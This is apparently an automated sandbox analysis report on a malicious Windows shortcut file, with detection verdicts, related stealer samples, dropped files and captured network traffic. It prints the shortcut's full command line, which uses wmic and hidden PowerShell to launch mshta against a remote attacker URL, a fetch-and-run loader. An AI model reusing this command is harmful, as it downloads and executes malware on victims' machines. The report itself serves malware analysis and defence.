Original Sample Name: ed0e0fc1ef780ad73eb559719a3621e1.lnk
Detection: MAL
Classification: mal88.evad.winLNK@9/12@1/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 5
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .lnk
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 23.218.208.109, 20.12.23.50, 13.107.246.63
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target mshta.exe, PID 7944 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7864 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:03:39 | API Interceptor | 1x Sleep call for process: WMIC.exe modified
03:03:46 | API Interceptor | 2x Sleep call for process: svchost.exe modified
03:03:46 | API Interceptor | 1x Sleep call for process: mshta.exe modified
No context
                                         Match           | Associated Sample Name / URL | SHA 256  | Detection | Threat Name                                                     | Link   | Context
                                         CLOUDFLARENETUS | onaUtwpiyq.exe               | Get hash | malicious | LummaC                                                          | Browse | 104.21.11.101
                                                         | CAo57G5Cio.exe               | Get hash | malicious | LummaC                                                          | Browse | 172.67.165.185
                                                         | fer4JIJGeL.exe               | Get hash | malicious | LummaC                                                          | Browse | 172.67.165.185
                                                         | AaEBZ7icLd.exe               | Get hash | malicious | LummaC                                                          | Browse | 172.67.165.185
                                                         | wJtkC63Spw.exe               | Get hash | malicious | LummaC                                                          | Browse | 172.67.165.185
                                                         | cFLK1CiiNK.exe               | Get hash | malicious | LummaC                                                          | Browse | 172.67.165.185
                                                         | ZvHSpovhDw.exe               | Get hash | malicious | LummaC                                                          | Browse | 104.21.11.101
                                                         | 8WRONDszv4.exe               | Get hash | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, zgRAT | Browse | 104.21.11.101
                                                         | ARoqFi68Nr.exe               | Get hash | malicious | LummaC                                                          | Browse | 104.21.11.101
                                                         | DRWgoZo325.exe               | Get hash | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, Vidar        | Browse | 104.21.11.101
                                         Match                            | Associated Sample Name / URL | SHA 256  | Detection | Threat Name                 | Link   | Context
                                         37f463bf4616ecd445d4a1937da06e19 | vreFmptfUu.lnk               | Get hash | malicious | DanaBot                     | Browse | 104.21.67.124
                                                                          | aD7D9fkpII.exe               | Get hash | malicious | Vidar                       | Browse | 104.21.67.124
                                                                          | installer.bat                | Get hash | malicious | Vidar                       | Browse | 104.21.67.124
                                                                          | skript.bat                   | Get hash | malicious | Vidar                       | Browse | 104.21.67.124
                                                                          | din.exe                      | Get hash | malicious | Vidar                       | Browse | 104.21.67.124
                                                                          | yoda.exe                     | Get hash | malicious | Vidar                       | Browse | 104.21.67.124
                                                                          | lem.exe                      | Get hash | malicious | Vidar                       | Browse | 104.21.67.124
                                                                          | markiz.exe                   | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.21.67.124
                                                                          | utkin.exe                    | Get hash | malicious | CredGrabber, Meduza Stealer | Browse | 104.21.67.124
                                                                          | script.ps1                   | Get hash | malicious | Vidar                       | Browse | 104.21.67.124
                                        No context
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):1.3073446578123196
                                        Encrypted:false
                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvru:KooCEYhgYEL0In
                                        MD5:7D23C15E7DA425E11D247CE5927C6D03
                                        SHA1:9B3960754948D59AF0F536265B06C2CE969255C6
                                        SHA-256:B840B98414494DE29B85083BD8706B288B1F15B4C3F1B726388CE1DD3B49525D
                                        SHA-512:FCC698FDF8661E14F70C7CCB15036ADFB3589D800185ED2845370A4A0625F3114714F36FADE972C73673841F14E71E03D24D407157418FD02C10DA3D818F42F8
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0xcf94166d, page size 16384, DirtyShutdown, Windows version 10.0
                                        Category:dropped
                                        Size (bytes):1310720
                                        Entropy (8bit):0.42207924562964805
                                        Encrypted:false
                                        SSDEEP:1536:xSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:xaza/vMUM2Uvz7DO
                                        MD5:E382A0D1A2FBE15C46A7A1E4CD0F14C2
                                        SHA1:C35140E526EEDAB766D316411FEFD7A5595D601B
                                        SHA-256:A925123C00AF1E190554BDCA4F168374E81C7E45E64E07C1349B0A67EA0B8203
                                        SHA-512:33C2356248CEDE5FA59D6113B32532674A1CC3DCB466596FED4F9D9BD01B57EB375C16FE78267E43F2D467403F821F3E160A72DB2660EC0597CAEDF80472E7FD
                                        Malicious:false
                                        Reputation:low
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16384
                                        Entropy (8bit):0.07413805066341175
                                        Encrypted:false
                                        SSDEEP:3:G3mll/lKYe9jZIl+luhajn13a/yt+3IlllllAllcVO/lnlZMxZNQl:ZltKz9lIllha53qyt+3Illl/AOewk
                                        MD5:BEFE8D1549E1A23D3D5EE58361D36D00
                                        SHA1:A1CC281EE928EE209C867DB3145356EAAE549D11
                                        SHA-256:6D6FC9A02205549AA323A9E2A892B36A4E67848B2AC0C399AD1B661AA8776EFC
                                        SHA-512:FDE678E563D480DDAE6DC8E977C9EEDBB1ED9B5B5D2B8448A0C8127A4EF39D3C65A992CFB25C5DBAB9AE0638A2E506C5F213033FF997C26485D6942D25A260CD
                                        Malicious:false
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:ASCII text, with very long lines (24050)
                                        Category:dropped
                                        Size (bytes):24051
                                        Entropy (8bit):4.941039417164537
                                        Encrypted:false
                                        SSDEEP:192:VuR/6okgTQwq23gGM8lUR9YRGQ2BwoX6zp+1+nDT1FvxKSI7/UsV7MSE6XZ2dKzk:JwV+oUcoQJpdf1dxKSI7/Ue7ZX2qk
                                        MD5:5E8C69A459A691B5D1B9BE442332C87D
                                        SHA1:F24DD1AD7C9080575D92A9A9A2C42620725EF836
                                        SHA-256:84E3C77025ACE5AF143972B4A40FC834DCDFD4E449D4B36A57E62326F16B3091
                                        SHA-512:6DB74B262D717916DE0B0B600EEAD2CC6A10E52A9E26D701FAE761FCBC931F35F251553669A92BE3B524F380F32E62AC6AD572BEA23C78965228CE9EFB92ED42
                                        Malicious:false
                                        Preview:#cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapper del,#cf-wrapper details,#cf-wrapper dfn,#cf-wrapper div,#cf-wrapper dl,#cf-wrapper dt,#cf-wrapper em,#cf-wrapper embed,#cf-wrapper fieldset,#cf-wrapper figcaption,#cf-wrapper figure,#cf-wrapper footer,#cf-wrapper form,#cf-wrapper h1,#cf-wrapper h2,#cf-wrapper h3,#cf-wrapper h4,#cf-wrapper h5,#cf-wrapper h6,#cf-wrapper header,#cf-wrapper hgroup,#cf-wrapper html,#cf-wrapper i,#cf-wrapper iframe,#cf-wrapper img,#cf-wrapper label,#cf-wrapper legend,#cf-wrapper li,#cf-wrapper mark,#cf-wrapper menu,#cf-wrapper nav,#cf-wrapper object,#cf-wrapper ol,#cf-wrapper output,#cf-wrapper p,#cf-wrapper pre,#cf-wrapper s,#cf-wrapper samp,#cf-wrapper section,#cf-wrapper small,#cf-wrapper span,#cf-wrapper strike,#cf-wrapper strong,#cf-wrapper sub,#cf-w
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:PNG image data, 54 x 54, 8-bit colormap, non-interlaced
                                        Category:dropped
                                        Size (bytes):452
                                        Entropy (8bit):7.0936408308765495
                                        Encrypted:false
                                        SSDEEP:12:6v/7EljW8E6Cl2SYh8SZM4tf70FSDvMXDxJp6ScFChY9:U8hCl2SIdZBtAFSDUX/ozIhK
                                        MD5:C33DE66281E933259772399D10A6AFE8
                                        SHA1:B9F9D500F8814381451011D4DCF59CD2D90AD94F
                                        SHA-256:F1591A5221136C49438642155691AE6C68E25B7241F3D7EBE975B09A77662016
                                        SHA-512:5834FB9D66F550E6CECFE484B7B6A14F3FCA795405DECE8E652BD69AD917B94B6BBDCDF7639161B9C07F0D33EABD3E79580446B5867219F72F4FC43FD43B98C3
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):64
                                        Entropy (8bit):0.773832331134527
                                        Encrypted:false
                                        SSDEEP:3:Nlllulet:NllUe
                                        MD5:C3BD7F493D570718B5F1870D88DF5D3B
                                        SHA1:A4A0D7CFF3C663AB0144144C578C243926600E5C
                                        SHA-256:96DDC3E55B17140BE259812B00E7B566DC3B8F4E3ECB983EE0DE668D1969600F
                                        SHA-512:AD44555CBEBB536B32891DF4A03319728FFFF042ECCA33E6B97A0D2C0BF70D6961F2C1C7105D28F17D7536BEE8D45FBEE718D9B499DA9B2C53AC1F77F81B14CC
                                        Malicious:false
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):60
                                        Entropy (8bit):4.038920595031593
                                        Encrypted:false
                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                        Malicious:false
                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:JSON data
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.306461250274409
                                        Encrypted:false
                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                        Malicious:false
                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                        Process:C:\Windows\System32\wbem\WMIC.exe
                                        File Type:ASCII text, with CRLF, CR line terminators
                                        Category:dropped
                                        Size (bytes):160
                                        Entropy (8bit):5.108203110114614
                                        Encrypted:false
                                        SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglTb0qJQAiveyzoa:Yw7gJGWMXJXKSOdYiygKkXe/egZdeAin
                                        MD5:7F3AFEB99B0BAB41FB8ED0374686F10B
                                        SHA1:B68761E8687430915A6DB9156EF7C832BAC6BE5B
                                        SHA-256:F5D04A7463A9A35388AD2EC0B9E12075DFADB2F089E9FE6B84BAD6DA551F03EE
                                        SHA-512:5028B6964FF51DDD40781C784E08D3200DB999D53A99276A91111A5C09D050C02858AABBEEC6A36A7AA85E9BEFF8CD088B1B5669D07AAD81468FB9967D7AD9C5
                                        Malicious:false
                                        Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7684;...ReturnValue = 0;..};....
                                        File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                        Entropy (8bit):1.0537404993285517
                                        TrID:
                                        • Windows Shortcut (20020/1) 100.00%
                                        File name:K9esyY0r4G.lnk
                                        File size:5'836 bytes
                                        MD5:ed0e0fc1ef780ad73eb559719a3621e1
                                        SHA1:a739f5a4cb67f3b8ea5b4b5d08e35c4a60f8bd8c
                                        SHA256:6c8573069dadedd4fb861b3de01f94a87024f872fdd51652ad8959443851b333
                                        SHA512:e098ad7a3de3134c0d38562a6bd5a829551fd7e5a8b7b6ba2c855ba9d5cdc41672f83ced949f9018e27a072bc07ab4072a97c968bbd5d005db093df64eceaf8b
                                        SSDEEP:24:8lH/BUlgKN4ed+/31kWNdk6Zocdlg9qdd79dsrabxJlpl9l:8BuGeq1ldkUXddJ9AadrL9
                                        TLSH:FAC13B042AF90B20F3B39F72547677148A7F7C5BEE738E1D008195881527A11E839FAB
                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                        Icon Hash:929e9e96a3f3d6ed

                                        General

                                        Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
                                        Command Line Argument:process call create "powershell -w 1 powershell -Command ('ms' + 'hta' + '.exe ' + 'https://nextgencoding.cyou/asd/amber3')"
                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                         Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                         Dec 27, 2024 09:03:42.879884958 CET | 60190 | 53 | 192.168.2.4 | 1.1.1.1
                                         Dec 27, 2024 09:03:43.311978102 CET | 53 | 60190 | 1.1.1.1 | 192.168.2.4
                                         Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                         Dec 27, 2024 09:03:42.879884958 CET | 192.168.2.4 | 1.1.1.1 | 0x79bd | Standard query (0) | nextgencoding.cyou | A (IP address) | IN (0x0001) | false
                                         Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                         Dec 27, 2024 09:03:43.311978102 CET | 1.1.1.1 | 192.168.2.4 | 0x79bd | No error (0) | nextgencoding.cyou | - | 104.21.67.124 | A (IP address) | IN (0x0001) | false
                                         Dec 27, 2024 09:03:43.311978102 CET | 1.1.1.1 | 192.168.2.4 | 0x79bd | No error (0) | nextgencoding.cyou | - | 172.67.174.198 | A (IP address) | IN (0x0001) | false
                                        • nextgencoding.cyou
                                        • https:
                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         0 | 192.168.2.4 | 49730 | 104.21.67.124 | 443 | 7944 | C:\Windows\System32\mshta.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         2024-12-27 08:03:44 UTC | 332 | OUT | GET /asd/amber3 HTTP/1.1
                                        Accept: */*
                                        Accept-Language: en-CH
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: nextgencoding.cyou
                                        Connection: Keep-Alive
                                         2024-12-27 08:03:45 UTC | 562 | IN | HTTP/1.1 403 Forbidden
                                        Date: Fri, 27 Dec 2024 08:03:45 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        X-Frame-Options: SAMEORIGIN
                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g0FqQnREmqgQB3pJ%2FrKa9HJjbW4tJ6kkwAav53jATEL1UNCWKG53kOWgpsALlL7fRtY%2BbHiNOexqJo34L8Uw%2Bq7Rqhp4JP9AOA%2BFMxGFbOeEPCTmb1%2BvVWJWZzALxb5ggkkgumg%3D"}],"group":"cf-nel","max_age":604800}
                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                        Server: cloudflare
                                        CF-RAY: 8f87cbbeead24405-EWR
                                        2024-12-27 08:03:45 UTC807INData Raw: 31 31 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                        Data Ascii: 11cb<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                        2024-12-27 08:03:45 UTC1369INData Raw: 63 67 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e
                                        Data Ascii: cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElemen
                                        2024-12-27 08:03:45 UTC1369INData Raw: 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20
                                        Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form
                                        2024-12-27 08:03:45 UTC1018INData Raw: 65 76 65 61 6c 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e
                                        Data Ascii: eveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1">
                                         2024-12-27 08:03:45 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                         Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                         1 | 192.168.2.4 | 49731 | 104.21.67.124 | 443 | 7944 | C:\Windows\System32\mshta.exe
                                         Timestamp | Bytes transferred | Direction | Data
                                         2024-12-27 08:03:46 UTC | 398 | OUT | GET /cdn-cgi/styles/cf.errors.css HTTP/1.1
                                        Accept: */*
                                        Referer: https://nextgencoding.cyou/asd/amber3
                                        Accept-Language: en-CH
                                        UA-CPU: AMD64
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                        Host: nextgencoding.cyou
                                        Connection: Keep-Alive
                                         2024-12-27 08:03:47 UTC | 411 | IN | HTTP/1.1 200 OK
                                        Date: Fri, 27 Dec 2024 08:03:46 GMT
                                        Content-Type: text/css
                                        Content-Length: 24051
                                        Connection: close
                                        Last-Modified: Mon, 16 Dec 2024 06:11:56 GMT
                                        ETag: "675fc4ac-5df3"
                                        Server: cloudflare
                                        CF-RAY: 8f87cbc9ff698c24-EWR
                                        X-Frame-Options: DENY
                                        X-Content-Type-Options: nosniff
                                        Expires: Fri, 27 Dec 2024 10:03:46 GMT
                                        Cache-Control: max-age=7200
                                        Cache-Control: public
                                        Accept-Ranges: bytes
                                        2024-12-27 08:03:47 UTC958INData Raw: 23 63 66 2d 77 72 61 70 70 65 72 20 61 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 62 62 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 72 74 69 63 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 61 73 69 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 69 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6c 6f 63 6b 71 75 6f 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 6e 76 61 73 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 61 70 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 65 6e 74 65 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 69 74 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 63 6f 64 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 64 64 2c 23 63 66 2d 77 72 61 70 70
                                        Data Ascii: #cf-wrapper a,#cf-wrapper abbr,#cf-wrapper article,#cf-wrapper aside,#cf-wrapper b,#cf-wrapper big,#cf-wrapper blockquote,#cf-wrapper body,#cf-wrapper canvas,#cf-wrapper caption,#cf-wrapper center,#cf-wrapper cite,#cf-wrapper code,#cf-wrapper dd,#cf-wrapp
                                        2024-12-27 08:03:47 UTC1369INData Raw: 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 74 72 6f 6e 67 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 62 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 6d 6d 61 72 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 75 70 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 61 62 6c 65 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 62 6f 64 79 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 66 6f 6f 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 68 65 61 64 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 72 2c 23 63 66 2d 77 72 61 70 70 65 72 20 74 74 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 2c 23 63 66 2d 77 72 61 70 70 65 72 20 75 6c 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f
                                        Data Ascii: e,#cf-wrapper strong,#cf-wrapper sub,#cf-wrapper summary,#cf-wrapper sup,#cf-wrapper table,#cf-wrapper tbody,#cf-wrapper td,#cf-wrapper tfoot,#cf-wrapper th,#cf-wrapper thead,#cf-wrapper tr,#cf-wrapper tt,#cf-wrapper u,#cf-wrapper ul{margin:0;padding:0;bo
                                        2024-12-27 08:03:47 UTC1369INData Raw: 31 2e 35 21 69 6d 70 6f 72 74 61 6e 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 74 61 70 2d 68 69 67 68 6c 69 67 68 74 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 36 2c 31 33 39 2c 33 31 2c 2e 33 29 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 7d 23 63 66 2d 77 72 61 70 70 65 72 20 2e 63 66 2d 73 65 63 74 69 6f 6e 2c 23 63 66 2d 77 72 61 70 70 65 72 20 73 65 63 74 69 6f 6e 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 30 20 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 32 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 65 6d
                                        Data Ascii: 1.5!important;text-decoration:none!important;letter-spacing:normal;-webkit-tap-highlight-color:rgba(246,139,31,.3);-webkit-font-smoothing:antialiased}#cf-wrapper .cf-section,#cf-wrapper section{background:0 0;display:block;margin-bottom:2em;margin-top:2em
